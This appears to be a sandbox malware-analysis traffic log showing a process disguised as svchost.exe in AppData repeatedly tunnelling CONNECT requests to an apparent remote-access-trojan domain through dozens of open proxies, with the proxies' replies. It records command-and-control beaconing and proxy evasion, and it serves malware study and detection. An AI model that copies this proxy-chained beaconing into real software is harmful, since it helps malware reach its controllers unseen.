                                                                                    Mar 9, 2024 13:14:36.198445082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3443192.168.2.5609275.252.23.220108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.199044943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3444192.168.2.556940162.223.116.758043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.203464985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.760848045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.474622965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3445192.168.2.560931200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.205519915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3446192.168.2.56092242.49.148.167900143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.229063034 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:36.669317961 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3447192.168.2.56060151.158.98.2111637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.238651991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3448192.168.2.56059382.223.121.721546443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.261157036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3449192.168.2.560943185.101.16.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.299962044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3450192.168.2.560952185.217.136.67133743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.300858021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3451192.168.2.5567871.194.236.229500543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.315515995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.117012024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.177655935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3452192.168.2.560951103.118.46.177808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.329541922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3453192.168.2.556769201.217.246.212808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.340559959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3454192.168.2.56074839.165.0.137900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.343671083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.645695925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.667567968 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3455192.168.2.556885103.121.39.158108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.363109112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3456192.168.2.560615107.180.95.177712843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.401340008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3457192.168.2.559923199.229.254.129414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.401566982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3458192.168.2.560925111.59.4.88900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.401915073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.037731886 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3459192.168.2.560972201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.415983915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3460192.168.2.560740184.178.172.251529143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.426789999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3461192.168.2.56096694.130.94.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.430185080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3462192.168.2.55953685.62.218.250312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.485761881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.851891041 CET1254INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.28
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 952
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ah_test
                                                                                    Via: 1.1 ah_test (squid/3.5.28)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 33 36 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:36 GMT</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3463192.168.2.557011103.113.170.230312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.529704094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3464192.168.2.560617115.74.157.191108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.538106918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3465192.168.2.56098518.167.191.223108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.573950052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.333347082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333789110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3466192.168.2.559884189.240.60.171909043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.575138092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.926775932 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3467192.168.2.56095745.138.87.238108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.575176954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3468192.168.2.560971111.90.150.109108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.575237036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3469192.168.2.56097538.54.16.978043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.575278997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.918128967 CET176INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Length: 19
                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                    Data Ascii: 404 page not found


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3470192.168.2.56095843.131.248.1651567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.579385042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3471192.168.2.560948185.158.114.142569743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.579464912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3472192.168.2.56094943.155.130.1821567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.579514027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3473192.168.2.560947110.12.211.1408043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.579520941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


